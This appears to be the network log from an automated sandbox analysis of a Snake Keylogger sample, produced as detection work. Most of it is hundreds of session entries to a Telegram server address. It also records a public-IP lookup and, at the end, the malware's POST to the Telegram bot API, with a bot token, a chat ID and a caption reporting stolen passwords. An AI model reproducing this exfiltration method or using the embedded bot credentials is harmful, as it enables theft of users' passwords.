                                                                    261192.168.2.550177149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    262192.168.2.550180149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    263192.168.2.550183149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    264192.168.2.550185149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    265192.168.2.550188149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    266192.168.2.550192149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    267192.168.2.550195149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    268192.168.2.550197149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    269192.168.2.550200149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    27192.168.2.549795149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    270192.168.2.550203149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    271192.168.2.550205149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    272192.168.2.550206149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    273192.168.2.550207149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    274192.168.2.550208149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    275192.168.2.550209149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    276192.168.2.550210149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    277192.168.2.550211149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    278192.168.2.550212149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    279192.168.2.550213149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    28192.168.2.549796149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    280192.168.2.550214149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    281192.168.2.550215149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    282192.168.2.550216149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    283192.168.2.550217149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    284192.168.2.550218149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    285192.168.2.550219149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    286192.168.2.550220149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    287192.168.2.550221149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    288192.168.2.550222149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    289192.168.2.550223149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    29192.168.2.549798149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    290192.168.2.550224149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    291192.168.2.550225149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    292192.168.2.550226149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    293192.168.2.550227149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    294192.168.2.550228149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    295192.168.2.550229149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    296192.168.2.550230149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    297192.168.2.550231149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    298192.168.2.550232149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    299192.168.2.550233149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    3192.168.2.549771149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    30192.168.2.549799149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    300192.168.2.550234149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    301192.168.2.550235149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    302192.168.2.550236149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    303192.168.2.550237149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    304192.168.2.550238149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    305192.168.2.550239149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    306192.168.2.550240149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    307192.168.2.550241149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    308192.168.2.550242149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    309192.168.2.550243149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    31192.168.2.549801149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    310192.168.2.550244149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    311192.168.2.550245149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    312192.168.2.550247149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    313192.168.2.550248149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    314192.168.2.550249149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    315192.168.2.550250149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    316192.168.2.550251149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    317192.168.2.549746193.122.130.080C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jun 26, 2022 09:32:22.672653913 CEST282OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Jun 26, 2022 09:32:22.784780025 CEST283INHTTP/1.1 200 OK
                                                                    Date: Sun, 26 Jun 2022 07:32:22 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 106
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 34 33 2e 36 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.143.61</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    32192.168.2.549802149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    33192.168.2.549803149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    34192.168.2.549804149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    35192.168.2.549805149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    36192.168.2.549808149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    37192.168.2.549809149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    38192.168.2.549810149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    39192.168.2.549812149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    4192.168.2.549772149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    40192.168.2.549814149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    41192.168.2.549815149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    42192.168.2.549816149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    43192.168.2.549817149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    44192.168.2.549818149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    45192.168.2.549821149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    46192.168.2.549822149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    47192.168.2.549824149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    48192.168.2.549825149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    49192.168.2.549827149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    5192.168.2.549773149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    50192.168.2.549829149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    51192.168.2.549830149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    52192.168.2.549833149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    53192.168.2.549838149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    54192.168.2.549841149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    55192.168.2.549844149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    56192.168.2.549847149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    57192.168.2.549852149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    58192.168.2.549857149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    59192.168.2.549859149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    6192.168.2.549774149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    60192.168.2.549863149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    61192.168.2.549865149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    62192.168.2.549868149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    63192.168.2.549871149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    64192.168.2.549874149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    65192.168.2.549876149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    66192.168.2.549879149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    67192.168.2.549881149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    68192.168.2.549884149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    69192.168.2.549888149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    7192.168.2.549775149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    70192.168.2.549890149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    71192.168.2.549893149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    72192.168.2.549895149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    73192.168.2.549898149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    74192.168.2.549901149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    75192.168.2.549904149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    76192.168.2.549906149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    77192.168.2.549907149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    78192.168.2.549909149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    79192.168.2.549911149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    8192.168.2.549776149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    80192.168.2.549913149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    81192.168.2.549914149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    82192.168.2.549917149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    83192.168.2.549919149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    84192.168.2.549922149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    85192.168.2.549925149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    86192.168.2.549928149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    87192.168.2.549931149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    88192.168.2.549934149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    89192.168.2.549936149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    9192.168.2.549777149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    90192.168.2.549937149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    91192.168.2.549938149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    92192.168.2.549939149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    93192.168.2.549940149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    94192.168.2.549941149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    95192.168.2.549942149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    96192.168.2.549943149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    97192.168.2.549944149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    98192.168.2.549945149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    99192.168.2.549946149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.549759149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:25 UTC0OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756c77a0974
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    Connection: Keep-Alive
